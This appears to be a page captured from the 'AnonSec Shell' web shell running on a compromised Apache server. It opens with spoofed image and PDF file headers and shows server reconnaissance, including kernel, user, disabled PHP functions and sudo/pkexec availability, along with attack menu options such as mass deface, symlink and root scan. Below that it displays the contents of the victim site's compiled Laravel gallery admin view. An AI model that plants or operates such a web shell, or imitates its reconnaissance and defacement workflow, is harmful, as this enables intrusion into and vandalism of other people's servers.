ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/storage/framework/views/196b93eb585989e3a8eb287d6b17b422
<?php $__env->startSection('content'); ?>
    <section class="content-header">
        <h1>
            <?php echo e($galeria->name); ?>

            <small>Adicionar imagens</small>
        </h1>
    </section>

    <!-- Main content -->
    <section class="content">


        <div class="box box-success">
            <div class="box-header">
                <h3 class="box-title">Adicionar imagens para <?php echo e($galeria->name); ?></h3>
            </div>
            <div class="box-body">

                <?php echo Form::open(['route' => ['imgs.store'] , 'method' => 'post', 'role' => 'form', 'files' => true]); ?>

                <div class="form-group">
                    <?php echo Form::label('file', 'Imagem'); ?>

                    <?php echo Form::file('file[]', ['class' => 'form-control', 'multiple', 'required']); ?>

                </div>

                <input type="hidden" value="<?php echo e($galeria->id); ?>" name="galeria_id">
                <button type="submit" class="btn btn-success">
                    <i class="glyphicon glyphicon-plus"></i> Adicionar
                </button>

                <?php echo Form::close(); ?>


            </div>
            <!-- /.box-body -->
        </div>
        <!-- /.box -->


        <div class="box box-default">
            <div class="box-header">
                <h3 class="box-title">Imagens cadastradas</h3>
            </div>
            <div class="box-body">
                <div class="row">
                    <?php $__empty_1 = true; foreach($galeria->imgs as $imgs): $__empty_1 = false; ?>

                        <div class="col-lg-2 col-md-2 col-sm-3 col-xs-6 margin-bottom">
                            <div class="thumbnail" style="height: 120px; overflow: hidden;">
                                <img src="<?php echo e(asset('uploads/galeria/add/thumbs/'.$imgs->file)); ?>" width="100%">
                            </div>
                            <a href="<?php echo e(route('imgs.destroy', ['id' =>$imgs->id, 'file' => $imgs->file])); ?>"
                               class="btn btn-xs btn-danger">
                                <i class="glyphicon glyphicon-remove"></i> Excluir</a>
                        </div>

                    <?php endforeach; if ($__empty_1): ?>
                        Nenhuma imagem cadastrada para esta galeria
                    <?php endif; ?>
                </div>
            </div>
            <!-- /.box-body -->
        </div>
        <!-- /.box -->

    </section>
    <!-- /.content -->
<?php $__env->stopSection(); ?>
<?php echo $__env->make('master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team